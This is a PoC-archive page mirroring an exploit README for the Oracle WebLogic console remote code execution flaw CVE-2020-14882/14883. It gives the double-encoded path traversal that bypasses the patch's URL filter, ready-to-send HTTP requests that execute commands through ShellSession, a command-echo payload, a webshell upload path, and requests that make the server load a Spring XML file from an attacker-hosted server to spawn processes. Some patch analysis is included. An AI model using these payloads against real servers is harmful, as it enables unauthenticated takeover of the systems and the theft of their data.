Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-14882 PoC — Oracle WebLogic Server 安全漏洞

Source
https://github.com/jas502n/CVE-2020-14882
Associated Vulnerability
Title:Oracle WebLogic Server 安全漏洞 (CVE-2020-14882)
Description:Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
CVE-2020–14882、CVE-2020–14883
Readme
# CVE-2020–14882 Weblogic Unauthorized bypass RCE

## bypass patch with CVE-2020–14882

`private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};`


#### list

```
%252E%252E
%2E%2E
..
%3E
%3C
;
<
>
```

#### lower

```
>>> "%252E%252E%252F".lower()
'%252e%252e%252f'
```
`%252E%252E%252F` to `%252e%252e%252f`

`/console/css/%252e%252e%252fconsole.portal`


```
╰─$ grep -rn 'IllegalUrl' *
console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java:19:   private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};
console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java:40:         for(int i = 0; i < IllegalUrl.length; ++i) {
console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java:41:            if (url.contains(IllegalUrl[i])) {
```

```
package com.bea.console.utils;

import com.bea.netuix.servlets.manager.SingleFileServlet;
import java.io.IOException;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;

public class MBeanUtilsInitSingleFileServlet extends SingleFileServlet {
   private static final Log LOG = LogFactory.getLog(MBeanUtilsInitSingleFileServlet.class);
   private static final String WL_DISPATCH_POLICY = "wl-dispatch-policy";
   private static boolean hasInited = false;
   private static final long serialVersionUID = 1L;
   private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};

   public static void initMBean() {
      MBeanUtilsInitializer.initMBeanAsynchronously();
   }

   public void init(ServletConfig config) throws ServletException {
      ConsoleWorkManagerUtils.init(config.getInitParameter("wl-dispatch-policy"));
      super.init(config);
   }

   public void service(ServletRequest req, ServletResponse resp) throws ServletException, IOException {
      if (!hasInited) {
         initMBean();
         hasInited = true;
      }

      if (req instanceof HttpServletRequest) {
         HttpServletRequest httpServletRequest = (HttpServletRequest)req;
         String url = httpServletRequest.getRequestURI();

         for(int i = 0; i < IllegalUrl.length; ++i) {
            if (url.contains(IllegalUrl[i])) {
               if (resp instanceof HttpServletResponse) {
                  LOG.error("Invalid request URL detected. ");
                  HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
                  httpServletResponse.sendError(404);
               }

               return;
            }
         }
      }

      try {
         super.service(req, resp);
      } catch (IllegalStateException var7) {
         if (LOG.isDebugEnabled()) {
            LOG.debug(var7);
         }
      } catch (IOException var8) {
         if (LOG.isDebugEnabled()) {
            LOG.debug(var8);
         }
      }

   }
}

```
![](./images/IllegalUrl.png)

## CVE-2020-14750 patch.png

![](./images/CVE-2020-14750%20patch.png)

`consoleapp/webapp/WEB-INF/lib/console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java`

```
         for(int i = 0; i < IllegalUrl.length; ++i) {
            if (url.contains(IllegalUrl[i])) {
               if (resp instanceof HttpServletResponse) {
                  LOG.error("Invalid request URL detected. ");
                  HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
                  httpServletResponse.sendError(404);
               }

               return;
            }
         }
```

##### ConsoleUtils.isUserAuthenticated(httpServletRequest)
```
      if (req instanceof HttpServletRequest) {
         HttpServletRequest httpServletRequest = (HttpServletRequest)req;
         String url = httpServletRequest.getRequestURI();
         if (!ConsoleUtils.isUserAuthenticated(httpServletRequest)) {
            throw new ServletException("User not authenticated.");
         }

         if (!this.isValidUrl(url, httpServletRequest)) {
            if (resp instanceof HttpServletResponse) {
               LOG.error("Invalid request URL detected.");
               HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
               httpServletResponse.sendError(404);
            }

            return;
         }
      }
```

```
   private boolean isValidUrl(String url, HttpServletRequest req) {
      String consoleContextPath = ConsoleUtils.getConsoleContextPath();
      List portalList = ConsoleUtils.getConsolePortalList();
      Iterator var5 = portalList.iterator();

      String tmp;
      do {
         if (!var5.hasNext()) {
            return false;
         }

         String portal = (String)var5.next();
         tmp = "/" + consoleContextPath + portal;
      } while(!url.equals(tmp));

      return true;
   }
```
#### ConsoleUtils.getConsolePortalList

```
   public static List getConsolePortalList() {
      if (consolePortalList == null) {
         consolePortalList = new ArrayList();
         consolePortalList.add("/console.portal");
         consolePortalList.add("/consolejndi.portal");
         String validPortalNames = System.getProperty("weblogic.console.validPortalNames");
         if (!StringUtils.isEmptyString(validPortalNames)) {
            String[] vArray = validPortalNames.split(",");

            for(int i = 0; i < vArray.length; ++i) {
               consolePortalList.add(vArray[i]);
            }
         }
      }

      return consolePortalList;
   }
```


## Command Echo For Weblogic 12.2.1.4.0

#### e.g.

`cmd: chcp 65001&&whoami&&ipconfig`

![](./images/command.png)

#### Burpsuite

```
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
cmd: chcp 65001&&whoami&&ipconfig
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1258

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
    res.getWriter().write("");
}executeThread.interrupt();
");
```

#### 回显参考链接:

```
https://xz.aliyun.com/t/5299
https://github.com/feihong-cs/Java-Rce-Echo/blob/master/weblogic/code/WeblogicEcho.jsp
https://mp.weixin.qq.com/s/u8cZEcku-uIbGAVAcos5Tw

```
#### 回显payload
```
weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
    res.getWriter().write("");
}
executeThread.interrupt();
```

![](./images/Class.png)
![](./images/Constructor.png)
![](./images/interrupt.png)




## ShellSession

`coherence-rest.jar#com.tangosol.coherence.mvel2.sh.ShellSession`

#### Payload

```
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
```
![](./images/ShellSession.png)

#### Getshell

`ROOT_PATH= C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\`

`Shell_path= ../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp`

![](./images/upload.png)
![](./images/webshell-1.png)
![](./images/webshell-2.png)

[![asciicast](https://asciinema.org/a/MwvRG8zcmtmWspFHlWExVm05S.svg)](https://asciinema.org/a/MwvRG8zcmtmWspFHlWExVm05S)


## FileSystemXmlApplicationContext

`com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext`

```
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://172.16.242.1:8989/poc.xml")
```
![](./images/FileSystemXmlApplicationContext.png)

#### poc.xml

`python -m SimpleHTTPServer`

`python -m pyftpdlib`

```
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value><![CDATA[calc]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>
```
## ClassPathXmlApplicationContext

`com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext`

```
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.28.128:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://172.16.242.1:8989/poc.xml")
```
![](./images/ClassPathXmlApplicationContext.png)

## patch for CVE-2020–14882

#### no patch 

`C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar`

`com.bea.console.utils.MBeanUtilsInitSingleFileServlet`


![](./images/patch.png)



## patch bypass notice for CVE-2020-14882

`[Vulnerability warning] WebLogic console remote execution vulnerability (CVE-2020-14882) patch bypasses 0day`

https://help.aliyun.com/noticelist/articleid/1060738870.html

## vuln version

```
WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0
```

## 参考链接

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

https://www.oracle.com/security-alerts/cpuoct2020.html
File Snapshot

 [4.0K]  /data/pocs/b4bb37f93ae840a1833542e3a3cecf330932eee0
├── [4.0K]  images
│   ├── [2.5M]  ClassPathXmlApplicationContext.png
│   ├── [681K]  Class.png
│   ├── [1.3M]  command.png
│   ├── [223K]  Constructor.png
│   ├── [1.5M]  CVE-2020-14750 patch.png
│   ├── [2.5M]  FileSystemXmlApplicationContext.png
│   ├── [ 87K]  IllegalUrl.png
│   ├── [1.2M]  interrupt.png
│   ├── [234K]  patch.png
│   ├── [1.8M]  ShellSession.png
│   ├── [1.6M]  upload.png
│   ├── [1.4M]  webshell-1.png
│   └── [1.3M]  webshell-2.png
└── [ 13K]  README.md

1 directory, 14 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →